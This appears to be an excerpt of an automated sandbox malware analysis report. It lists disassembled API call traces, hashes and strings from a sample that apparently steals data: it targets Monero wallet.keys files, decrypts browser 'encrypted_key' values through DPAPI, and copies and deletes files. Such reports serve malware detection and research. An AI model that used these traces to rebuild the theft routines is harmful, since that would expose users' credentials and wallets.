                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D481
                              • lstrlen.KERNEL32(00000000), ref: 0068D698
                              • lstrlen.KERNEL32(00000000), ref: 0068D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0068D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                              • Instruction ID: 5a3d46461ca49818272ea98771e230742dd12d1102323d2031f524f3e6c13d45
                              • Opcode Fuzzy Hash: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                              • Instruction Fuzzy Hash: 8191FE718201189BDF48FBE4DD96DEE73BEBF14300F50416DF50666491EE346A09CBAA
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D801
                              • lstrlen.KERNEL32(00000000), ref: 0068D99F
                              • lstrlen.KERNEL32(00000000), ref: 0068D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0068DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                              • Instruction ID: ea3d857fbf0bec98a202f9d59b54e6732cb1ebe7a81ed805ebd2eed1e91c5a05
                              • Opcode Fuzzy Hash: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                              • Instruction Fuzzy Hash: 6881FF719201189BDF48FBE4DD96DEE73BEBF14300F50412DF406A6491EE346A09CBAA
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006A1580,006A0D92), ref: 0068F54C
                              • lstrlen.KERNEL32(00000000), ref: 0068F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 215f97cc63341f50b2e8cb448e480d4a27fb02a2d11b6bdf5159a575cad58f91
                              • Instruction ID: 5a20ceed1fdc80165cd5046e15528fe4730839462d42d92e7a25dc4f71960a1d
                              • Opcode Fuzzy Hash: 215f97cc63341f50b2e8cb448e480d4a27fb02a2d11b6bdf5159a575cad58f91
                              • Instruction Fuzzy Hash: CD51EA75D10108AADF44FBE0DD96DED73BEAF54300F40852CF816A6591EE346A09CBEA
                              Strings
                              • si, xrefs: 00697111
                              • si, xrefs: 006972AE, 00697179, 0069717C
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0069718C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: si$si$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 3722407311-4068855434
                              • Opcode ID: d14b0cd1559fec51a1655638cbcaca02d332afdf69c262574f0fb8940ef8be88
                              • Instruction ID: 376f03965e019f8d8290ec4f0c6a3b6fbcd33d49d7f34d095bad99e2a6c37821
                              • Opcode Fuzzy Hash: d14b0cd1559fec51a1655638cbcaca02d332afdf69c262574f0fb8940ef8be88
                              • Instruction Fuzzy Hash: E3518EB0C142189BDF54EB90DD85BEEB3BAAF44304F2440ADE60567681EB746E88CF59
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: bcdc6ec4fa8068323f6b112ec06c3fbb2f3c7761d71a6782c02a131a4897965b
                              • Instruction ID: 3db86b77fa47a8f87b70ba3756186eaa4a4b9746e88ce31292f44716f8b864d5
                              • Opcode Fuzzy Hash: bcdc6ec4fa8068323f6b112ec06c3fbb2f3c7761d71a6782c02a131a4897965b
                              • Instruction Fuzzy Hash: 2B412D75D10109AFDF04EFE4D845AFEB7BAAB44304F008418E51677790EB75AA06CFA6
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                                • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                                • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                                • Part of subcall function 00689B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                                • Part of subcall function 00689B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                                • Part of subcall function 00689B60: LocalFree.KERNEL32(?), ref: 00689BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 3012cb93d3b593d60d6b6c7098ee0865cb4a29e27646c4bf87b2d91c201bfc1f
                              • Instruction ID: 66a7373134b93c6c63e104bc06380b23baba049247e67d63bae9399073fcaca5
                              • Opcode Fuzzy Hash: 3012cb93d3b593d60d6b6c7098ee0865cb4a29e27646c4bf87b2d91c201bfc1f
                              • Instruction Fuzzy Hash: C73110B5D10109EBCF04EBE4DC85AFFB7BABF48304F184619E905A7241E7349A44CBA5
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006A05B7), ref: 006986CA
                              • Process32First.KERNEL32(?,00000128), ref: 006986DE
                              • Process32Next.KERNEL32(?,00000128), ref: 006986F3
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • CloseHandle.KERNEL32(?), ref: 00698761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                              • Instruction ID: e16eb9b00ec5023134a0cbe78390f292412913d536e88332ebdf1e242b9f734d
                              • Opcode Fuzzy Hash: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                              • Instruction Fuzzy Hash: 73315971911218ABCF64EB90DD45FEEB7BEFB45700F1041A9A10AA65A0DB306E45CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E00,00000000,?), ref: 006979B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 006979B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,006A0E00,00000000,?), ref: 006979C4
                              • wsprintfA.USER32 ref: 006979F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                              • Instruction ID: f5f4d492f384167bc8019fa18423e5f6f358f72cfcd2c2f57ecb21130b22cf91
                              • Opcode Fuzzy Hash: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                              • Instruction Fuzzy Hash: 701127B2904118ABCB18DFC9DD45FBEB7F8FB4CB15F10421AF605A2280E2395940CBB1
                              APIs
                              • __getptd.LIBCMT ref: 0069C74E
                                • Part of subcall function 0069BF9F: __amsg_exit.LIBCMT ref: 0069BFAF
                              • __getptd.LIBCMT ref: 0069C765
                              • __amsg_exit.LIBCMT ref: 0069C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0069C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                              • Instruction ID: 5c9ee928dc7781f0dee2da71b98ac7a91f90e07fc9e2c178aba364251901b3b3
                              • Opcode Fuzzy Hash: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                              • Instruction Fuzzy Hash: 7CF06D329006009BDFA0BBF86946B9933EBAF00730F20514DF404AAAD2DB645941AE9A
                              APIs
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00694F7A
                              • lstrcat.KERNEL32(?,006A1070), ref: 00694F97
                              • lstrcat.KERNEL32(?,014891C8), ref: 00694FAB
                              • lstrcat.KERNEL32(?,006A1074), ref: 00694FBD
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                                • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                                • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                                • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                              • Instruction ID: 41fdde4c53423ddd8d702985f4f5abc650967a4b5d1d3b3b57eaaeb5eed5336f
                              • Opcode Fuzzy Hash: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                              • Instruction Fuzzy Hash: 8121C8B69002086BCB98FBB0EC46EE9337DBB55304F004558B64997581EE749AC9CF96